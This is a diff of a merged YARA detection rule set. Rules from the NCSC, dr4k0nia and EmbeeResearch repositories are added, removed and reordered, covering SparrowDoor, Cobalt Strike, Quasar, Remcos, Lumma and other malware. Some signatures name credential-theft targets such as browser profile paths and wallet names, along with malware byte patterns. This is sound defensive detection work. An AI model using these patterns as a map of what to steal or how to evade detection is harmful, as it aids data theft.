+		hash1 = "989b3798841d06e286eb083132242749c80fdd4d"
+
+	strings:
+		$exsting_cmp = {8B 1E 3B 19 75 ?? 83 E8 04 83 C1 04 83 C6 04 83 F8 04}
+		$time_format_string = "%d/%d/%d %d:%d" ascii
+		$cre_fil_args = {6A 00 68 80 00 00 00 6A 04 6A 00 6A 02 68 00 00 00 40 52}
+
+	condition:
+		( uint16( 0 ) == 0x5A4D ) and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them and ( pe.imports ( "User32.dll" , "OpenClipboard" ) and pe.imports ( "User32.dll" , "GetClipboardData" ) and pe.imports ( "Kernel32.dll" , "GetLocalTime" ) and pe.imports ( "Kernel32.dll" , "GlobalSize" ) )
 }
 rule NCSC_Sparrowdoor_Strings
 {
@@ -172326,34 +172271,36 @@ rule NCSC_Sparrowdoor_Strings
 	condition:
 		10 of them
 }
-rule NCSC_Sparrowdoor_Sleep_Routine
+rule NCSC_Sparrowdoor_Xor
 {
 	meta:
-		description = "SparrowDoor implements a Sleep routine with value seeded on GetTickCount. This signature detects the previous and this variant of SparrowDoor. No MZ/PE match as the backdoor has no header."
+		description = "Highlights XOR routines in SparrowDoor. No MZ/PE match as the backdoor has no header. Targeting in memory."
 		author = "NCSC"
-		id = "9a0aa77d-7dbe-5007-b875-211cf528614b"
+		id = "9c07feea-91fc-528e-91ac-14d09fa1fc10"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_sleep_routine.yar#L1-L12"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_xor.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "8ae231cb43440e1771d9f7ecaccfedae33f4d14e5ebabd94a909e05bd9fe1bc1"
+		logic_hash = "3244e9017e5a0bf1c54e03b3191a5c695b2c1586b3ed4c529742f9b48903a348"
 		score = 75
 		quality = 80
 		tags = ""
 		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
 
 	strings:
-		$sleep = {FF D7 33 D2 B9 [4] F7 F1 81 C2 [4] 8B C2 C1 E0 04 2B C2 03 C0 03 C0 03 C0 50}
+		$xor_routine_outbound = {B8 39 8E E3 38 F7 E1 D1 EA 8D 14 D2 8B C1 2B C2 8A [4] 00 30 14 39 41 3B CE}
+		$xor_routine_inbound = {B8 25 49 92 24 F7 E1 8B C1 2B C2 D1 E8 03 C2 C1 E8 02 8D 14 C5 [4] 2B D0 8B C1 2B C2}
+		$xor_routine_config = {8B D9 83 E3 07 0F [6] 30 18 8D 1C 07 83 E3 07 0F [6] 30 58 01 8D 1C 28 83 E3 07 0F [6] 30 58 02 8D 1C 02 83 E3 07 0F [6] 30 58 03 8B DE 83 E3 07 0F [6] 30 58 04 83 C6 05 83 C1 05}
 
 	condition:
-		all of them
+		2 of them
 }
 /*
  * YARA Rule Set
  * Repository Name: Dr4k0nia
  * Repository: https://github.com/dr4k0nia/yara-rules
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8
  * Number of Rules: 5
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -172404,44 +172351,32 @@ rule DR4K0NIA_Msil_Susp_Obf_Xorstringsnet : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 25MB and dotnet.is_dotnet and $pattern
 }
-
-rule DR4K0NIA_Msil_Susp_Obf_Antidump : FILE
+rule DR4K0NIA_MAL_Msil_Net_Niximports_Loader : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Dr4k0nia"
+		description = "Detects NixImports .NET loader"
 		author = "dr4k0nia"
-		id = "d9217ade-a016-548e-b63f-f6ee78ff8775"
-		date = "2023-12-03"
-		modified = "2023-03-13"
-		reference = "https://github.com/dr4k0nia/yara-rules"
-		source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_susp_obf_antidump.yar#L7-L39"
+		id = "ba0d072d-674a-5790-9381-4dac98204268"
+		date = "2023-05-21"
+		modified = "2023-05-22"
+		reference = "https://github.com/dr4k0nia/NixImports"
+		source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_mal_niximports_loader.yar#L1-L21"
 		license_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/LICENSE.md"
-		hash = "ef7bb2464a2b430aa98bd65a1a40b851b57cb909ac0aea3e53729c0ff900fa42"
-		logic_hash = "18cfc720f54b2178398f8214591a3fb777ea11e67a8a6d2ce26cc4891a62fd35"
-		score = 65
+		logic_hash = "79421b2677705852f893fa53478deb2e4aa8bd354ac05cbf5438a3a2a15d70bf"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
 
 	strings:
-		$import0 = "ZeroMemory"
-		$import1 = "VirtualProtect"
-		$importt2 = "GetCurrentProcess"
-		$array0 = {08 00 00 00 0c 00 00 00 10 00 00 00 14 00 00 00
-		18 00 00 00 1c 00 00 00 24 00 00 00}
-		$array1 = {04 00 00 00 16 00 00 00 18 00 00 00 40 00 00 00
-		42 00 00 00 44 00 00 00 46 00 00 00 48 00 00 00
-		4a 00 00 00 4c 00 00 00 5c 00 00 00 5e 00 00 00}
-		$array2 = {00 00 00 00 08 00 00 00 0c 00 00 00 10 00 00 00
-		16 00 00 00 1c 00 00 00 20 00 00 00 28 00 00 00
-		2c 00 00 00 34 00 00 00 3c 00 00 00 4c 00 00 00
-		50 00 00 00 54 00 00 00 58 00 00 00 60 00 00 00
-		64 00 00 00 68 00 00 00 6c 00 00 00 70 00 00 00
-		74 00 00 00 04 01 00 00 08 01 00 00 0c 01 00 00
-		10 01 00 00 14 01 00 00 1c 01 00 00}
+		$op_pe = {C2 95 C2 97 C2 B2 C2 92 C2 82 C2 82 C2 8E C2 82 C2 82 C2 82 C2 82 C2 86 C2 82}
+		$op_delegate = {20 F0 C7 FF 80 20 83 BF 7F 1F 14 14}
+		$a1 = "GetRuntimeProperties" ascii fullword
+		$a2 = "GetTypes" ascii fullword
+		$a3 = "GetRuntimeMethods" ascii fullword
+		$a4 = "netstandard" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and dotnet.is_dotnet and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3MB and all of ( $a* ) and 2 of ( $op* )
 }
 
 rule DR4K0NIA_Msil_Suspicious_Use_Of_Strreverse : FILE
@@ -172470,32 +172405,44 @@ rule DR4K0NIA_Msil_Suspicious_Use_Of_Strreverse : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and dotnet.is_dotnet and filesize < 50MB and $csharp and $vbnet and $strreverse
 }
-rule DR4K0NIA_MAL_Msil_Net_Niximports_Loader : FILE
+
+rule DR4K0NIA_Msil_Susp_Obf_Antidump : FILE
 {
 	meta:
-		description = "Detects NixImports .NET loader"
+		description = "No description has been set in the source file - Dr4k0nia"
 		author = "dr4k0nia"
-		id = "ba0d072d-674a-5790-9381-4dac98204268"
-		date = "2023-05-21"
-		modified = "2023-05-22"
-		reference = "https://github.com/dr4k0nia/NixImports"
-		source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_mal_niximports_loader.yar#L1-L21"
+		id = "d9217ade-a016-548e-b63f-f6ee78ff8775"
+		date = "2023-12-03"
+		modified = "2023-03-13"
+		reference = "https://github.com/dr4k0nia/yara-rules"
+		source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_susp_obf_antidump.yar#L7-L39"
 		license_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/LICENSE.md"
-		logic_hash = "79421b2677705852f893fa53478deb2e4aa8bd354ac05cbf5438a3a2a15d70bf"
-		score = 75
+		hash = "ef7bb2464a2b430aa98bd65a1a40b851b57cb909ac0aea3e53729c0ff900fa42"
+		logic_hash = "18cfc720f54b2178398f8214591a3fb777ea11e67a8a6d2ce26cc4891a62fd35"
+		score = 65
 		quality = 85
 		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$op_pe = {C2 95 C2 97 C2 B2 C2 92 C2 82 C2 82 C2 8E C2 82 C2 82 C2 82 C2 82 C2 86 C2 82}
-		$op_delegate = {20 F0 C7 FF 80 20 83 BF 7F 1F 14 14}
-		$a1 = "GetRuntimeProperties" ascii fullword
-		$a2 = "GetTypes" ascii fullword
-		$a3 = "GetRuntimeMethods" ascii fullword
-		$a4 = "netstandard" ascii fullword
+		$import0 = "ZeroMemory"
+		$import1 = "VirtualProtect"
+		$importt2 = "GetCurrentProcess"
+		$array0 = {08 00 00 00 0c 00 00 00 10 00 00 00 14 00 00 00
+		18 00 00 00 1c 00 00 00 24 00 00 00}
+		$array1 = {04 00 00 00 16 00 00 00 18 00 00 00 40 00 00 00
+		42 00 00 00 44 00 00 00 46 00 00 00 48 00 00 00
+		4a 00 00 00 4c 00 00 00 5c 00 00 00 5e 00 00 00}
+		$array2 = {00 00 00 00 08 00 00 00 0c 00 00 00 10 00 00 00
+		16 00 00 00 1c 00 00 00 20 00 00 00 28 00 00 00
+		2c 00 00 00 34 00 00 00 3c 00 00 00 4c 00 00 00
+		50 00 00 00 54 00 00 00 58 00 00 00 60 00 00 00
+		64 00 00 00 68 00 00 00 6c 00 00 00 70 00 00 00
+		74 00 00 00 04 01 00 00 08 01 00 00 0c 01 00 00
+		10 01 00 00 14 01 00 00 1c 01 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3MB and all of ( $a* ) and 2 of ( $op* )
+		uint16( 0 ) == 0x5a4d and dotnet.is_dotnet and all of them
 }
 rule DR4K0NIA_MAL_MSIL_NET_Typhonlogger_Jul23 : FILE
 {
@@ -172531,7 +172478,7 @@ rule DR4K0NIA_MAL_MSIL_NET_Typhonlogger_Jul23 : FILE
  * YARA Rule Set
  * Repository Name: EmbeeResearch
  * Repository: https://github.com/embee-research/Yara-detection-rules/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4
  * Number of Rules: 39
  * Skipped: 0 (age), 8 (quality), 0 (score), 0 (importance)
@@ -172541,200 +172488,221 @@ rule DR4K0NIA_MAL_MSIL_NET_Typhonlogger_Jul23 : FILE
  *
  * NO LICENSE SET
  */
-
-rule EMBEERESEARCH_Win_Icedid_Snowloader_Bytecodes_Oct_2023
+rule EMBEERESEARCH_Win_Solarmarker_Stage2_Bytecodes_Dec_2023
 {
 	meta:
-		description = "No description has been set in the source file - EmbeeResearch"
+		description = "Patterns observed in Solarmarker stage2 dll"
 		author = "Matthew @ Embee_Research"
-		id = "ad5d7bf5-813d-519d-91ae-e6a69fd557df"
-		date = "2023-08-27"
-		modified = "2023-10-18"
+		id = "9aba6cdf-1491-579d-b4a7-fe229272015d"
+		date = "2023-12-28"
+		modified = "2023-12-28"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_icedid_snowloader_bytecodes_oct_2023.yar#L2-L23"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_solarmarker_stage2_bytecodes_dec_2023.yar#L1-L20"
 		license_url = "N/A"
-		hash = "e096de90f65ff83ed0e929b330aa765a8e2322625325fb042775bff1748467cc"
-		hash = "e87928fcddf13935c91a0b5577e28efd29bb6a5c1d98e5129dec63e231601053"
-		hash = "82a01607ebdcaa73b9ff201ccb76780ad8de4a99dd3df026dcb71b0f007456ed"
-		logic_hash = "5baa308ce130cbbe80f94fc127b083f26ae87552910c2bc6f3bae3008cf1aa63"
+		hash = "4a3b60496a793ee96a51fecf8690ef8312429a6b54d32f2a4424395c47b47fc8"
+		hash = "e0b2457491a8c2d50710aa343ad1957a76f83ceaf680165ffa0e287fe18abbd6"
+		logic_hash = "8e50e5942f0029ffda1d9750f8cc8e004a2512e50b6a14c1619ae0b83477a944"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s_1 = {4c 77 26 07}
-		$s_2 = {58 a4 53 e5}
-		$s_3 = {10 e1 8a c3}
+		$s1 = {6F ?? ?? 00 0A 1F 20 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 09 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0A 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0D 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0A }
 
 	condition:
-		( all of ( $s* ) ) and pe.number_of_exports > 20
+		$s1
 }
-rule EMBEERESEARCH_Win_Remcos_Rat_Unpacked : FILE
+rule EMBEERESEARCH_Win_Lumma_Simple_Strings : FILE
 {
 	meta:
-		description = "Detects strings present in remcos rat Samples."
+		description = ""
 		author = "Matthew @ Embee_Research"
-		id = "d4282638-592a-5c07-b07b-937e2a7879e4"
-		date = "2023-08-27"
-		modified = "2023-10-18"
+		id = "d949d547-a2ee-56d9-8510-74f3b718b2c0"
+		date = "2023-09-13"
+		modified = "2023-09-21"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_remcos_rat_unpacked_aug_2023.yar#L2-L32"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_lumma _simple_sep_2023.yar#L1-L40"
 		license_url = "N/A"
-		hash = "ec901217558e77f2f449031a6a1190b1e99b30fa1bb8d8dabc3a99bc69833784"
-		logic_hash = "c6d1772a5517b104de3022f4bab55d92784d35c3a252a4e0516083d8bd28cad0"
+		hash = "277d7f450268aeb4e7fe942f70a9df63aa429d703e9400370f0621a438e918bf"
+		logic_hash = "0b3cb6721d26b79afe892b1c4df5e54c18cd7a5492aeacd442deca6b9b926f3c"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$r0 = " ______                              " ascii
-		$r1 = "(_____ \\                             " ascii
-		$r2 = " _____) )_____ ____   ____ ___   ___ " ascii
-		$r3 = "|  __  /| ___ |    \\ / ___) _ \\ /___)" ascii
-		$r4 = "| |  \\ \\| ____| | | ( (__| |_| |___ |" ascii
-		$r5 = "|_|   |_|_____)_|_|_|\\____)___/(___/ " ascii
-		$s1 = "Watchdog module activated" ascii
-		$s2 = "Remcos restarted by watchdog!" ascii
-		$s3 = " BreakingSecurity.net" ascii
+		$s1 = "Binedx765ance Chaedx765in Waledx765let" wide
+		$s2 = "%appdaedx765ta%\\Moedx765zilla\\Firedx765efox\\Profedx765iles"
+		$s3 = "\\Locedx765al Extensedx765ion Settinedx765gs\\"
+		$s4 = "%appdedx765ata%\\Opedx765era Softwedx765are\\Opedx765era GX Staedx765ble"
+		$o1 = {57 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 65 00 62 00 20 00 44 00 61 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 74 00 61 00}
+		$o2 = {4f 00 70 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 65 00 72 00 61 00 20 00 4e 00 65 00 6f 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 6e 00}
+		$o3 = {4c 00 6f 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 67 00 69 00 6e 00 20 00 44 00 61 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 74 00 61 00}
 
 	condition:
-		(( all of ( $r* ) ) or ( all of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( ( all of ( $s* ) ) or ( all of ( $o* ) ) )
 }
-rule EMBEERESEARCH_Win_Redline_Bytecodes_Jan_2024 : FILE
+rule EMBEERESEARCH_Win_Cobaltstrike_Pipe_Strings_Nov_2023 : FILE
 {
 	meta:
-		description = "Bytecodes found in late 2023 Redline malware"
+		description = "Detects default strings related to cobalt strike named pipes"
 		author = "Matthew @ Embee_Research"
-		id = "8acf0fbb-f7d1-5a3d-9ccb-ee21926d6a31"
-		date = "2023-08-27"
-		modified = "2024-01-02"
+		id = "9237f4e8-b9c4-54cb-9cb2-999d267392af"
+		date = "2023-11-04"
+		modified = "2023-11-04"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_bytecodes_jan_2024.yar#L1-L22"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobaltstrike_pipe_strings_nov_2023.yar#L1-L24"
 		license_url = "N/A"
-		hash = "ea1271c032046d482ed94c6d2c2c6e3ede9bea57dff13156cabca42b24fb9332"
-		logic_hash = "43f4d718611c16983071587c2806f92550ebba6bae737c59c63cd8584a5cc01f"
+		hash = "99986d438ec146bbb8b5faa63ce47264750a8fdf508a4d4250a8e1e3d58377fd"
+		hash = "090402a6e2db12cbdd3a889b7b46bb7702acc0cad37d87ff201230b618fe7ed5"
+		hash = "eb2b263937f8d28aa9df7277b6f25d10604a5037d5644c98ee0ab8f7a25db7b4"
+		logic_hash = "ff17fe9d04d9ad6aa5c034b69d412b0d62c48c537c3a54a465761e27e9255e6d"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = {00 00 7E ?? ?? ?? 04 7E ?? ?? ?? 04 28 ?? ?? ?? 06 17 8D ?? ?? ?? 01 25 16 1F 7C 9D 6F ?? ?? ?? 0A 13 ?? 16 13 ?? 38 }
-		$s2 = "mscoree.dll" ascii
+		$s1 = "%c%c%c%c%c%cMSSE-%d-server"
+		$s2 = "ConnectNamedPipe"
+		$s3 = "CreateNamedPipeA"
+		$s4 = "TlsGetValue"
 
 	condition:
-		$s1 and $s2 and uint16( 0 ) == 0x5a4d
+		( all of ( $s* ) ) and filesize < 500KB
 }
 
-rule EMBEERESEARCH_Win_Pikabot_Resource_Entropy_Oct_2023
+rule EMBEERESEARCH_Win_Quasar_Rat_Client : FILE
 {
 	meta:
-		description = "Pikabot Loaders embedding encrypted inside of numerous png images"
+		description = "Detects strings present in Quasar Rat Samples."
 		author = "Matthew @ Embee_Research"
-		id = "253d35ae-a325-51c7-8da5-32bb46c51acd"
-		date = "2023-10-03"
-		modified = "2023-10-08"
+		id = "7fc0bd6d-e187-51b7-a8b8-68b17271cef8"
+		date = "2023-08-27"
+		modified = "2023-10-18"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_pikabot_resource_entropy_oct_2023.yar#L5-L40"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_quasar_rat_client_aug_2023.yar#L3-L37"
 		license_url = "N/A"
-		hash = "936247d9a0ce76bed17f03430186abb9ecafa88ef3a968cdd46c5b0a24a5cc3f"
-		hash = "2c7b7c3ec8a6a835e07c8feed401460e185388f59ea5fc8aa8038d2b75815666"
-		hash = "00239c55d7135aa06e21ace557a3e8bf3818c2e07051c84753209e7348b6a426"
-		hash = "5f218eeb83c936d88b65ec3f3052d8c53f58775dacc04bedc91bd388fb7bb885"
-		hash = "6bea3ecd1f43bdcc261719fb732fcf27e82ed6f4b086616925291a733f358a26"
-		hash = "966042f3e532b6abce7d96bbdb91dc4561b32a4b0b9eec7b08b4f1024c2da916"
-		hash = "951c906a1fa179050d30c06849d42e49a295dd1baad91efb244b2e5486b5801d"
-		hash = "a06bd2623c389f2547d0bf750ca720ab7a74c90982267aad49ba31d5de345288"
-		hash = "aeb2bf8898636b572b0703d9ddb90b9a4c5c6db9eee631ee726ad753f197ac12"
-		logic_hash = "7beec034fc927990734691bd6859870921027860c0591c7a0d5a3815f919112d"
+		hash = "914d88f295ac2213f37d3f71e6d4383979283d1728079a208f286effb44d840c"
+		hash = "45a724179ae1d08044c4bafb69c7f9cdb4ed35891dc9cf24aa664d75464ceb6d"
+		hash = "7e13bcd73232c3f33410aa95f61e1196a2f9ae35e05c1f9c8f251e07077a9dfb"
+		logic_hash = "efba911780ffb144f277e88ff8ca8f53a90c32a677ccb19ec26e71f974a1b91f"
 		score = 75
-		quality = 50
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "ARROW-DOWN" wide
-		$s2 = "ARROW-LEFT" wide
-		$s3 = "ARROW-RIGHT" wide
+		$s1 = "Quasar Client" ascii wide
+		$s2 = "Quasar.Client.Properties.Resources" ascii wide
+		$s3 = "Google\\Chrome\\User Data\\Default\\" wide
+		$s4 = "\\Mozilla\\Firefox\\Profiles" wide
+		$s5 = "Yandex\\YandexBrowser\\User Data\\Default\\" wide
 
 	condition:
-		pe.DLL and ( all of ( $s* ) ) and pe.number_of_resources > 25 and pe.sections [ 3 ] . raw_data_size > 400KB and math.entropy ( pe.sections [ 3 ] . raw_data_offset , pe.sections [ 3 ] . raw_data_size ) > 7.5
+		uint16( 0 ) == 0x5a4d and dotnet.is_dotnet and filesize < 7000KB and ( for any i in ( 0 .. dotnet.number_of_resources -1 ) : ( dotnet.resources [ i ] . name == "Quasar.Client*" ) or ( 3 of ( $s* ) ) )
 }
-rule EMBEERESEARCH_Win_Solarmarker_Stage2_Bytecodes_Dec_2023
+rule EMBEERESEARCH_Win_Medusa_Bytecodes
 {
 	meta:
-		description = "Patterns observed in Solarmarker stage2 dll"
+		description = "Medusa Bytecodes"
 		author = "Matthew @ Embee_Research"
-		id = "9aba6cdf-1491-579d-b4a7-fe229272015d"
-		date = "2023-12-28"
-		modified = "2023-12-28"
+		id = "48b659f8-cd26-540a-89b6-6349f8d21e8f"
+		date = "2023-08-27"
+		modified = "2024-03-03"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_solarmarker_stage2_bytecodes_dec_2023.yar#L1-L20"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_medusa_dotnet_bytecodes.yar#L1-L17"
 		license_url = "N/A"
-		hash = "4a3b60496a793ee96a51fecf8690ef8312429a6b54d32f2a4424395c47b47fc8"
-		hash = "e0b2457491a8c2d50710aa343ad1957a76f83ceaf680165ffa0e287fe18abbd6"
-		logic_hash = "8e50e5942f0029ffda1d9750f8cc8e004a2512e50b6a14c1619ae0b83477a944"
+		hash = "a1211549b4e1a7befd953d03b4d929b3dc9f25ec6c1bc9c05ae92a0ec08fb77c"
+		logic_hash = "aa01afd6981af99625a9fca93e512cc00931aca18e55c5cb6dee11efb9ea2968"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = {6F ?? ?? 00 0A 1F 20 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 09 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0A 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0D 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0A }
+		$s1 = {1F ?? 8D ?? ?? ?? 01 25 16 72 ?? ?? ?? 70 A2 25 17 72 ?? ?? ?? 70 28 ?? ?? ?? 0A A2 25 18 20 ?? ?? ?? 00 13 04 12 04 28 ?? ?? ?? 0A A2 25 19 20 ?? ?? ?? 00 13 ?? 12 }
+		$s2 = "\\Medusa\\obj\\Release\\Medusa.pdb" ascii
 
 	condition:
-		$s1
+		$s1 or $s2
 }
-rule EMBEERESEARCH_Win_Cobalt_Strike_Loader_Shellcode_Jun_2023 : FILE
+rule EMBEERESEARCH_Win_Cobalt_Sleep_Encrypt : FILE
 {
 	meta:
-		description = "Detection of an encoder observed with Cobalt Strike shellcode"
-		author = "Matthew @ Embee_research"
-		id = "ea52b9e7-f2bd-5c9f-9ee1-506baa48be84"
-		date = "2023-07-03"
-		modified = "2023-07-03"
+		description = "Detects Sleep Encryption Logic Found in Cobalt Strike Deployments"
+		author = "Matthew @ Embee_Research"
+		id = "6bd6fbb4-6634-5b51-90f0-f24e48d69043"
+		date = "2023-08-27"
+		modified = "2023-10-18"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobalt_shellcode_encoder_jun_2023.yar#L1-L21"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobalt_sleep_encrypt_aug_2023.yar#L1-L55"
 		license_url = "N/A"
-		logic_hash = "42b4b9ab681f3164168de84e76bcd8161865fa9e5871d70a6de534b23896e4f0"
+		hash = "26b2f12906c3590c8272b80358867944fd86b9f2cc21ee6f76f023db812e5bb1"
+		logic_hash = "7aa2674ecaaae819c3f26924fa0622df322b1214493f37b1bdf5e00ba5ee98e6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		vendor = ""
 
 	strings:
-		$get_enc_offset = {8b 88 c0 00 00 00 8b 90 c4 00 00 00 48 8d b0 c8 00 00 00}
-		$decode_loop = {ac 83 e1 03 d2 c8 ff c1 aa ff ca 75 f3}
-		$b64_initial_bytes = "SInISIlMJAiLiMAAAACLkMQAAABIjbDIAAAA" wide ascii
+		$r1_nokey = {4E 8B 04 08 B8 ?? ?? ?? ?? 41 F7 E3 41 8B C3 C1 EA 02 41 FF C3 6B D2 0D 2B C2 8A 4C 18 18 41 30 0C 38 48 8B 43 10 41 8B FB 4A 3B 7C 08 08}
+		$r2_nokey = {49 8B F9 4C 8B 03 B8 ?? ?? ?? ?? 41 F7 E1 41 8B C1 C1 EA 02 41 FF C1 6B D2 0D 2B C2 8A 4C 18 18 42 30 0C 07 48 FF C7 45 3B CB}
 
 	condition:
-		(( $get_enc_offset and $decode_loop ) or $b64_initial_bytes ) and filesize < 10000KB
+		($r1_nokey or $r2_nokey )
 }
-rule EMBEERESEARCH_Win_Lumma_Simple_Strings : FILE
+rule EMBEERESEARCH_Win_Remcos_Rat_Unpacked : FILE
 {
 	meta:
-		description = ""
+		description = "Detects strings present in remcos rat Samples."
 		author = "Matthew @ Embee_Research"
-		id = "d949d547-a2ee-56d9-8510-74f3b718b2c0"
-		date = "2023-09-13"
-		modified = "2023-09-21"
+		id = "d4282638-592a-5c07-b07b-937e2a7879e4"
+		date = "2023-08-27"
+		modified = "2023-10-18"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_lumma _simple_sep_2023.yar#L1-L40"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_remcos_rat_unpacked_aug_2023.yar#L2-L32"
 		license_url = "N/A"
-		hash = "277d7f450268aeb4e7fe942f70a9df63aa429d703e9400370f0621a438e918bf"
-		logic_hash = "0b3cb6721d26b79afe892b1c4df5e54c18cd7a5492aeacd442deca6b9b926f3c"
+		hash = "ec901217558e77f2f449031a6a1190b1e99b30fa1bb8d8dabc3a99bc69833784"
+		logic_hash = "c6d1772a5517b104de3022f4bab55d92784d35c3a252a4e0516083d8bd28cad0"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Binedx765ance Chaedx765in Waledx765let" wide
-		$s2 = "%appdaedx765ta%\\Moedx765zilla\\Firedx765efox\\Profedx765iles"
-		$s3 = "\\Locedx765al Extensedx765ion Settinedx765gs\\"
-		$s4 = "%appdedx765ata%\\Opedx765era Softwedx765are\\Opedx765era GX Staedx765ble"
-		$o1 = {57 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 65 00 62 00 20 00 44 00 61 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 74 00 61 00}
-		$o2 = {4f 00 70 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 65 00 72 00 61 00 20 00 4e 00 65 00 6f 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 6e 00}
